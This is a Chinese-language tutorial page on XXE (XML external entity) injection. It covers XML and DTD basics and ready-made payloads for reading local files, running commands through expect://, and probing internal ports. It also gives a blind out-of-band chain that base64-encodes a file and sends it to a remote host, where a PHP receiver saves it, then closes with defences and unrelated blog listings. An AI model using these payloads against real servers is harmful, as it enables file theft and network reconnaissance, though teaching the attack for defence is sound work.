当前位置：首页 > news >正文

XXE漏洞简介

news 2025/7/6 15:10:13

漏洞原理

漏洞危害

前置知识

XML简介

DTD简介

DTD的两种声明方式

实体

实体分类

内置实体(Built-inentities)

字符实体（Characterentities）

通用实体（Generalentities）

参数实体(Parameterentities)

XXE漏洞出现场景

XXE漏洞利用

任意文件读取

系统命令执行

探测内网端口

无回显XXE漏洞利用

XXE防御措施

漏洞原理

XXE Injection（ XML External Entity Injection， XML 外部实体注入攻击）攻击者可以通过 XML 的外部实体来获取服务器中本应被保护的数据。对于 XXE 漏洞最为关键的部分是 DTD 文档类型， DTD 的作用是定义 XML 文档的合法构建模块。 DTD 可以在 XML 文档内声明，也可以外部引用， libxml2.9.1 及以后，默认不再解析外部实体。

漏洞危害

当允许引用外部实体时，通过恶意构造，可以导致以下常见的危害：

任意文件读取
执行系统命令
探测内网端口

前置知识

XML简介

XML 指可扩展标记语言，XML 被设计用来传输和存储数据，你可以理解为就是⼀种写法类似于html语⾔的数据格式⽂档。但是xml跟html是为不同⽬的⽽设计的，html旨在显⽰数据信息，⽽xml旨在传输数据信息。

DTD简介

文档类型定义（DTD）可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。

DTD 可被成行地声明于 XML 文档中，也可作为一个外部引用。

DTD的两种声明方式

DTD 可被成行地声明于 XML 文档中，也可作为一个外部引用。

1.内部DTD：对XML文档中的元素、属性和实体的DTD的声明都在XML文档中。

2.外部DTD：对XML文档中的元素、属性和实体的DTD的声明都在一个独立的DTD文件（.dtd）中。

注释：这里只介绍外部DTD。

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ELEMENT root ANY >
<!ENTITY xxe SYSTEM "file:///c:/test.dtd" >]>
<root>&xxe;</root>

!ELEMENT root ANY 定义元素为ANY，既可以接受任何元素；

!ENTITY xxe SYSTEM "file:///c:/test.dtd" 定义了一个外部实体，文档会对c:/test.dtd文件资源进行引用，这是一种用SYSTEM关键字的引用方式。

实体

实体是用于定义引用普通文本或特殊字符的快捷方式的变量。

实体引用是对实体的引用。
实体可在内部或外部进行声明。

实体分类

内置实体(Built-inentities)

实体	实体引用	含义
quot	"	双引号
amp	&	（“and”符）
apos	'	（撇号或单引号）
lt	<	小于号
gt	>	大于号

字符实体（Characterentities）

实体名称	符号	十进制参考	十六进制参考
quot	"	&#34；	&#x22；
amp	&	&#38；	&#x26；
apos	'	&#39；	&#x27；
lt	<	&#60；	&#x3C；
gt	>	&#62；	&#x3E；

其中内置实体和字符实体都和html的实体编码类似，有十进制和十六进制，一个实体由三部分构成：一个和号（&），一个实体名称，以及一个分号（；）。

通用实体（Generalentities）

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]>
<foo>&xxe;</foo>

参数实体(Parameterentities)

<!ENTITY % remote-dtd SYSTEM "http://somewhere.example.org/remote.dtd">%remote-dtd;

remote.dtd:

<!ENTITY writer "Donald Duck.">
<!ENTITY copyright "Copyright runoob.com">

XXE漏洞出现场景

XXE漏洞主要是关注测试的目标系统，是否存在请求传输XML数据格式的API，如果遇到有XML数据格式传输的请求，就可进一步操作看是否存在XXE漏洞。
可上传excel文件的上传点、图片上传点

XXE漏洞利用

有回显XXE和无回显XXE

任意文件读取

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]>
<foo>&xxe;</foo>

系统命令执行

注意：在安装 expect 扩展的 PHP 环境里执行系统命令；

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://ipconfig" >]>
<foo>&xxe;</foo>

windows用ipconfig,linux用ifconfig

探测内网端口

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://192.168.1.6:22" >]>
<foo>&xxe;</foo>

可以在ip后面的端口爆破，爆破出开放的端口。

无回显XXE漏洞利用

<?xmlversion="1.0"encoding="utf-8"?>
<!DOCTYPE xxe[
<!ELEMENT name ANY>
<!ENTITY %file SYSTEM "php://filter/read=convert.base64-
encode/resource=/c:/windows/win.ini">
<!ENTITY %remote SYSTEM "http://192.168.220.132/entities.dtd">
%remote;
%all;
%send;
]>

entities.dtd 中代码如下：

<!ENTITY %all
"<!ENTITY &#x25; send SYSTEM 'http://192.168.64.130/test.php?file=%file;'>">

注：把“%”转成html实体编码是因为在实体的值中不能有%，所以需要转换成：%

test.php中的代码如下：

<?php
$file="./test.txt";
$content=base64_decode($_GET['file']);file_put_contents($file,$content);
echo"\n";
?>

XXE防御措施

1. 字符串实体编码

字符	转义
"	&quot；
&	&amp；
'	&apos；
<	&lt；
>	&gt；

2.过滤用户提交的 XML 数据，关键词：， SYSTEM 和 PUBLIC；

3.禁用外部实体： libxml_disable_entity_loader(true)；

XXE漏洞简介

目录漏洞原理漏洞危害前置知识 XML简介 DTD简介 DTD的两种声明方式实体实体分类内置实体(Built-inentities) 字符实体（Characterentities） 通用实体（Generalentities） 参数实体(Parameterentities) XXE漏洞…...

编程日记 2024/6/1 22:07:18

小白跟做江科大32单片机之蜂鸣器

1.复制之前编写的工程库项目，详细工程库创建过程如下链接： 小白跟做江科大32单片机之LED闪烁-CSDN博客https://blog.csdn.net/weixin_58051657/article/details/139295351?spm1001.2014.3001.55022.按照江科大老师给的图片进行连接蜂鸣器接线时要用公…...

编程日记 2024/6/1 22:06:17

IsoBench:多模态基础模型性能的基准测试与优化

随着多模态基础模型的快速发展，如何准确评估这些模型在不同输入模态下的性能成为了一个重要课题。本文提出了IsoBench，一个基准数据集，旨在通过提供多种同构（isomorphic）表示形式的问题，来测试和评估多模态…...

编程日记 2024/6/1 22:03:14

MyEclipse使用教程

MyEclipse使用教程如下，按照以下步骤，您可以逐步熟悉并掌握MyEclipse的基本使用： 一、MyEclipse安装与准备软件准备： 在使用MyEclipse之前，您需要确保已经安装了JDK（Java Development Kit）。J…...

编程日记 2024/6/1 22:02:13

TiDB学习9：Ti Cloud简介

目录 1. 为什么选择TiDB 2. 多租户 3. TiDB架构 4. 什么是TiDB Cloud 5. TiDB Cloud Provider Region 6. TiDB Cloud 入门 6.1 在浏览器中打开TiDB Cloud 6.2 创建您的账户 6.3 Developer Tier 与Dedicated Tier 6.3.1 Developer Tier 6.3.2 Dedicated Tier 6.3.2.…...

编程日记 2024/6/1 22:01:12

JavaScript 创建新节点的方法

在 JavaScript 中，可以使用 document.createElement() 方法来创建新的节点。该方法接受一个字符串参数，表示要创建的节点类型，如 "div"、"p" 等。创建一个新节点的基本步骤如下： 使用 document.createElem…...

编程日记 2024/6/1 21:57:08

在phpstorm2024版里如何使用Jetbrains ai assistant 插件？

ai assistant激活成功后，如图 ai assistant渠道：https://web.52shizhan.cn/activity/ai-assistant 在去年五月份的 Google I/O 2023 上，Google 为 Android Studio 推出了 Studio Bot 功能，使用了谷歌编码基础模型 Codey,Codey 是…...

编程日记 2024/6/1 21:55:05

进程间通信（27000字超详解）

🌎进程间通信文章目录： 进程间通信进程间通信简介进程间通信目的初识进程间通信进程间通信的分类匿名管道通信认识管道匿名管道匿名管道测试管道的四种…...

编程日记 2024/6/1 21:54:04

一、大模型推理

https://github.com/hiyouga/LLaMA-Factory/blob/main/README_zh.md https://github.com/hiyouga/LLaMA-Factory/blob/main/examples/README_zh.md 安装 v7.1 https://github.com/hiyouga/LLaMA-Factory/releases/tag/v0.7.1 git clone --depth 1 https://github.com/hiyoug…...

编程日记 2024/6/1 21:53:02

.NET IoC 容器（三）Autofac

目录 .NET IoC 容器（三）AutofacAutofacNuget 安装实现DI定义接口定义实现类依赖注入注入方式构造函数注入 | 属性注入 | 方法注入注入实现接口注册重复注册指定参数注册生命周期默认生命周期单例生命周期每个周期范围一个生命周期依赖配置Nuget配置文…...

编程日记 2024/6/1 21:47:58

Day44 动态规划part04

背包问题 01背包问题：每件物品只能用一次完全背包问题：每件物品可以使用无数次 01背包问题暴力解法：每一件物品其实只有两个状态，取或者不取，所以可以使用回溯法搜索出所有的情况，那么时间复杂度就是 o…...

编程日记 2024/6/1 21:46:56

html期末复习速览

一.基础标签 1.段落标签<p></p> 特点：分段分割 2.标题标签<h1></h1>……<h6></h6> 特点：文字加粗，单独占一行 3.换行标签<br /> 特点：单标签，强制换行二.文本格式化…...

编程日记 2024/6/1 21:45:55

CTFHUB-信息泄露-目录遍历和PHPINFO

目录目录遍历 PHPINFO 目录遍历很简单，挨着把每个目录都点开看一下发现2目录下有个 flag.txt 文件，点开发现了本关的flag PHPINFO 这关也很简单，进来之后是一个phpinfo页面，按 CTRL F键打开查询，输入flag&#…...

编程日记 2024/6/1 21:44:54

面向Java程序员的Go工程开发入门流程

对于一个像我这样没有go背景的java程序员来说，使用go开发一个可用的程序的速度是肉眼可见的缓慢。其难点不在于go语言本身，而是搭建整个工程链路的过程，即所谓的“配环境”。本文主要讲述如何配出一个适合go开发的环境，以免有同…...

编程日记 2024/6/1 21:40:46

vue3开发高德地图

在vue3的index.html 使用动态注入地址名和key <html lang"en"><head><meta charset"UTF-8" /><link rel"icon" type"image/svgxml" href"/vite.svg" /><meta name"viewport" conten…...

编程日记 2024/6/1 21:39:45

通过DLL方式链接glfw3.dll

主要是CMakeLists.txt文件变化 cmake_minimum_required(VERSION 3.10) project(glfwTest) set(CMAKE_CXX_STANDARD 11) aux_source_directory(. SRC_SOURCES) set(GLFW_INCLUDE_DIR ${CMAKE_SOURCE_DIR}/include) set(GLFW_LIBRARY_DIR ${CMAKE_SOURCE_DIR}/lib/glfw) add_ex…...

编程日记 2024/6/1 21:38:43

漏洞原理

漏洞危害

前置知识

XML简介

DTD简介

DTD的两种声明方式

实体

实体分类

内置实体(Built-inentities)

字符实体（Characterentities）

通用实体（Generalentities）

参数实体(Parameterentities)

XXE漏洞出现场景

XXE漏洞利用

任意文件读取

系统命令执行

探测内网端口

无回显XXE漏洞利用

XXE防御措施

相关文章：